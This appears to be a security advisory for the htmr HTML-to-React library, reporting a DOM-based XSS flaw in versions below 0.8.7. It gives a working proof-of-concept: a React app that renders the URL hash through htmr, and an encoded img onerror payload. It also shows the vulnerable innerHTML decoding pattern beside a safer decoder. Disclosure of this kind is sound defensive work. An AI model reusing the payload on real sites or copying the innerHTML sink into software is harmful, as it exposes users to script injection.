htmr@0.4.8 vulnerabilities

Simple and lightweight (< 2kB) HTML to React converter that works in server and browser

Direct Vulnerabilities

Known vulnerabilities in the htmr package. This does not include vulnerabilities belonging to this package’s dependencies.

Vulnerability: Cross-site Scripting (XSS)
Severity: M (medium)

htmr is a simple and lightweight library for converting HTML strings into React elements.

Affected versions of this package are vulnerable to Cross-site Scripting (XSS). The module decodes HTML entities by assigning the string to an element's innerHTML, which parses the string as markup. An attacker who can place an HTML-encoded payload in the input therefore gets DOM-based XSS (see PoC).
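The innerHTML decoding pattern the description refers to, beside a string-level decoder that avoids it, as an added example; this is not htmr's code and not the 0.8.7 fix, and the names unsafeDecode, decodeEntities and NAMED_ENTITIES are made up for the illustration:

```javascript
// Added example, not htmr's code. It contrasts the pattern the advisory
// describes (decoding entities through innerHTML) with a string-level
// decoder that never hands the input to the HTML parser.

// Vulnerable pattern (browser only, shown for contrast): assigning to
// innerHTML parses the string as markup. An encoded "<img ... onerror=...>"
// becomes a real element and the browser fires its handler while parsing,
// before textContent is ever read back.
function unsafeDecode(str) {
  const el = document.createElement('div');
  el.innerHTML = str; // DOM-based XSS sink
  return el.textContent;
}

// Hardened pattern: decode entities with string operations only. The
// result is plain text; rendered as a text node (e.g. a React string
// child) it cannot create markup. Only common named entities are mapped
// here (assumption: the full HTML5 entity table is not needed to show this).
const NAMED_ENTITIES = {
  amp: '&', lt: '<', gt: '>', quot: '"', apos: "'", nbsp: '\u00a0',
};

function decodeEntities(str) {
  return str.replace(/&(#x[0-9a-f]+|#[0-9]+|[a-z]+);/gi, (match, body) => {
    if (body[0] === '#') {
      const hex = body[1] === 'x' || body[1] === 'X';
      const cp = parseInt(body.slice(hex ? 2 : 1), hex ? 16 : 10);
      // Leave anything outside the Unicode range untouched rather than guess.
      return cp <= 0x10ffff ? String.fromCodePoint(cp) : match;
    }
    // Unknown names stay as written, which is also what a browser shows.
    return Object.prototype.hasOwnProperty.call(NAMED_ENTITIES, body)
      ? NAMED_ENTITIES[body]
      : match;
  });
}

// Constructed input in the shape of the PoC fragment: after decoding it is
// still a string that merely looks like a tag, so it renders literally.
const SAMPLE = 'Hash: &lt;img src=x onerror=handler()&gt;';
const DECODED = decodeEntities(SAMPLE); // 'Hash: <img src=x onerror=handler()>'
```

Decoding is a single left-to-right pass, so a doubly encoded `&amp;lt;` becomes `&lt;` and stays text rather than being decoded again.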

PoC

  1. Create a React app: create-react-app xss-htmr
  2. Install htmr module: cd xss-htmr; npm i htmr
  3. Edit src/App.js file to this:
import React from 'react';
import convert from 'htmr';

export default function App() {
  // The URL fragment is user-controlled and is interpolated into the HTML
  // string unescaped; htmr decodes entities via innerHTML, so an
  // HTML-encoded payload in the fragment is parsed as live markup.
  return convert(`<p>Hash: ${window.location.hash}</p>`);
}
  4. Run the server: npm run start
  5. Visit http://localhost:3000/#&lt;img/src/onerror=alert('xss')&gt;; an alert will pop up.

How to fix Cross-site Scripting (XSS)?

Upgrade htmr to version 0.8.7 or higher.

Vulnerable versions: <0.8.7